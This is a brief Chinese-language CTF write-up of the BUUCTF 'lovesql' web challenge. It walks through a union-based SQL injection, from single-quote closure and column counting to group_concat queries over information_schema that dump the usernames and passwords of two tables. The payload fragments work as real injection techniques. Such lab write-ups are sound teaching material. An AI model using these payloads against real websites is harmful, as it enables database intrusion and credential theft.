47,【5】BUUCTF web lovesql

进入靶场

可知是单引号闭合,属于字符串型注入

则后续方法与字符串型无异

使用order by 判断出字节数为3

使用union select寻找注入点时切记第一个select为空

库名geek

表名group_concat(table_name) from information_schema.tables where table_schema='geek'#

geekuser l0ve1ysq1

字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

id username password

group_concat(column_name) from information_schema.columns where table_name='geekuser'#

可知两个表字段名相同

查询字段内容

group_concat(id,username,password) from geek.l0ve1ysq1#

group_concat(id,username,password) from geek.geekuser#

得到flag

笔记

1,本题考查字符串类型的注入

2,group_concat(id,username,password) from geek.geekuser#

一次可以爆出表格所有内容

相关推荐
这个DBA有点耶2 小时前
AI写的SQL跑崩了生产库,这锅谁背?
数据库·人工智能·程序员
镜舟科技2 小时前
Databricks 再提 LTAP,AI 时代的数据底座为何重回大一统叙事?
数据库·架构·agent
Databend3 小时前
从湖仓升级为 Agent 时代的数据控制面,Snowflake 和 Databricks 有哪些布局
大数据·数据库·agent
ClouGence6 小时前
SQL Server CDC 能放到 Always On 备库读吗?一文讲透原理与实践
数据库·sql server
先吃饱再说1 天前
存储的进化:从 MySQL 到浏览器缓存,数据到底住在哪?
数据库
Nturmoils1 天前
字段太多看不全,ksql 的展开模式和输出控制怎么用
数据库·后端
Databend1 天前
Agent 轨迹分析与归因的数据工程实践
大数据·数据库·agent
这个DBA有点耶1 天前
SQL改写进阶:标量子查询的“隐形代价”与消除实战
数据库·mysql·架构
smallyoung1 天前
数据库乐观锁深度解析:MySQL、PostgreSQL 实战 + Spring Boot 集成指南
数据库·mysql·postgresql
parade岁月1 天前
MySQL JOIN解析:朴实无华但食之有味
数据库·后端